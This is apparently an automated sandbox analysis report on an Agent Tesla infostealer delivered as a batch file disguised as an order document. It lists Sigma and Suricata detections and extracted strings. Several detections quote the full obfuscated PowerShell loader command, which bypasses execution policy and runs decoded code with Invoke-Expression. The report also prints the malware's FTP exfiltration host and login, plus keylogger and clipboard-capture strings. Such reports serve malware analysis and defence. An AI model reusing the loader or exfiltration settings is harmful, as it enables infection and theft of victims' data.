CAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T23:29:15.315170+0100	2029927	1	A Network Trojan was detected	192.168.2.5	49721	136.243.131.47	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T23:29:15.865363+0100	2855542	1	A Network Trojan was detected	192.168.2.5	49722	136.243.131.47	60398	TCP
2025-03-17T23:29:15.870448+0100	2855542	1	A Network Trojan was detected	192.168.2.5	49722	136.243.131.47	60398	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.hitplas.ro", "Username": "hit@hitplas.ro", "Password": "@hitplas.ro"}

Multi AV Scanner detection for submitted file

Source: order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat

Virustotal: Detection: 8%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Sample uses string decryption to hide its real strings

Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: /log.tmp
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: .html
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <html>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </html>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: .html
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <html>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </html>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>[
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ]<br>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: .html
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: .zip
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Time:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>User Name:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>Computer Name:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>OSFullName:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>CPU:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>RAM:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: IP Address:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <hr>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: New
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: IP Address:
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: true
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: https://api.ipify.org
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: false
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: false
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: false
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: false
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: true
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: false
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ftp://ftp.hitplas.ro
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: hit@hitplas.ro
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: @hitplas.ro
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: false
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: false
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: appdata
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: dtjsA
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: dtjsA.exe
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: dtjsA
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Type
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <hr>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <b>[
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ]</b> (
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: )<br>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {BACK}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {ALT+TAB}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {ALT+F4}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {TAB}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {ESC}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {Win}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {CAPSLOCK}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {KEYUP}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {KEYDOWN}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {KEYLEFT}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {KEYRIGHT}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {DEL}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {END}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {HOME}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {Insert}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {NumLock}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {PageDown}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {PageUp}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {ENTER}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F1}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F2}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F3}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F4}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F5}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F6}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F7}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F8}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F9}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F10}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F11}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {F12}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: control
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {CTRL}
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: &
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: >
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: "
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <hr>
